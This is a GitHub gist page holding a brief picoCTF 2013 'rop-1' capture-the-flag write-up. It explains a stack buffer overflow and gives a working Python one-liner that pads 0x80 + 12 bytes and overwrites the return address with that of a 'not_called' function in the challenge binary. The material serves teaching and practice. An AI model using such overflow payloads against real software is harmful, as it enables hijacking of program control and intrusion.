spnow/README.md

Forked from plvhx/README.md

Created December 22, 2016 12:48

Star (1) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/spnow/20363326884acf13dcb111b64c2b0b53.js"></script>
Save spnow/20363326884acf13dcb111b64c2b0b53 to your computer and use it in GitHub Desktop.

Download ZIP

picoCTF 2013 rop-1 re-writeup

Raw

README.md

to overwrite the 'vulnerable_function' return address, we need 0x80 + 12 junk of buffer plus address of 'not_called'. So, the payload skeleton is: ["\x41"*(0x80 + 12)] + [address of 'not_called' subroutine]

(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x080484a4))'; cat -) | ./rop1-fa6168f4d8eba0eb